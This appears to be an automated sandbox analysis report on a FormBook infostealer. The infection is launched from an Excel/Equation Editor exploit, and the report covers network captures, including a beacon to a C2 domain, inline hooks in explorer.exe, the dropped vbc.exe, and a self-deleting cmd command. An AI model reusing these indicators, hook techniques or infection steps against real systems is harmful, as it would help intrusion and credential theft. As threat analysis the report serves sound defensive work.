6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 50 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 20 26 72 61 71 75 6f 3b 20 79 6f 72 75 6d 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 
70 61 6c 65 74 63 69 6e 69 7a 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 65 63 75 72 65 73 65 72 76 65 72 63 64 6e 2e 6e 65 74 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 65 63 75 72 65 73 65 72 76 65 72 63 64 6e 2e 6e 65 74 2f 31 36 30 2e 31 35 33 2e 31 33 38 2e 35 33 2f 6f 76 7a 2e 64 30 33 2e 6d 79 66 74 70 75 70 6c 6f 61 64 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 64 69 73 74 2f 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 35 2e 35 2e 33 26 23 30 33 38 3b 74 69 6d
Data Ascii: 007e8a<!DOCTYPE html><html lang="tr"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Sayfa bulunamadı &#8211; Paletciniz.com</title><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="Paletciniz.com &raquo; beslemesi" href="http://www.paletciniz.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Paletciniz.com &raquo; yorum beslemesi" href="http://www.paletciniz.com/comments/feed/" /><link rel='preconnect' href='https://secureservercdn.net' crossorigin /><link rel='stylesheet' id='wp-block-library-css' href='https://secureservercdn.net/160.153.138.53/ovz.d03.myftpupload.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3&#038;tim


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49170 | 104.164.99.242 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 09:02:06.235939980 CET | 455 | OUT | GET /ogg/?Xrx4lx8=L5tkrd3+tAlV4v3imC1rTm4lbmURrJu8I1nhE3bKvhdVz9gPESQ8tOxzxkSNJHyX8NnBHA==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1
Host: www.annaothomas.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 26, 2020 09:02:06.403984070 CET | 456 | IN | HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Server: Nginx Microsoft-HTTPAPI/2.0
X-Powered-By: Nginx
Date: Thu, 26 Nov 2020 08:02:17 GMT
Connection: close
Data Raw: 33 0d 0a ef bb bf 0d 0a
Data Ascii: 3


Code Manipulations

User Modules

Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Processes

Process: explorer.exe, Module: USER32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE6
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE6
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE6
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE6

Statistics

Behavior

System Behavior

General

Start time: 08:59:57
Start date: 26/11/2020
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13ff30000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:00:17
Start date: 26/11/2020
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:00:20
Start date: 26/11/2020
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\vbc.exe'
Imagebase: 0xe90000
File size: 399360 bytes
MD5 hash: E54D832CB872B7DC086AB7A7878D38FB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 31%, ReversingLabs
Reputation: low

General

Start time: 09:00:21
Start date: 26/11/2020
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Users\Public\vbc.exe
Imagebase: 0xe90000
File size: 399360 bytes
MD5 hash: E54D832CB872B7DC086AB7A7878D38FB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 09:00:24
Start date: 26/11/2020
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0xffca0000
File size: 3229696 bytes
MD5 hash: 38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 09:00:37
Start date: 26/11/2020
Path: C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\wscript.exe
Imagebase: 0x4f0000
File size: 141824 bytes
MD5 hash: 979D74799EA6C8B8167869A68DF5204A
Has elevated privileges: true
Has administrator privileges: true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                      Reputation:high

                                                                                                                                      General

                                                                                                                                      Start time:09:00:41
                                                                                                                                      Start date:26/11/2020
                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                      Imagebase:0x4aaa0000
                                                                                                                                      File size:302592 bytes
                                                                                                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                      Disassembly

                                                                                                                                      Code Analysis
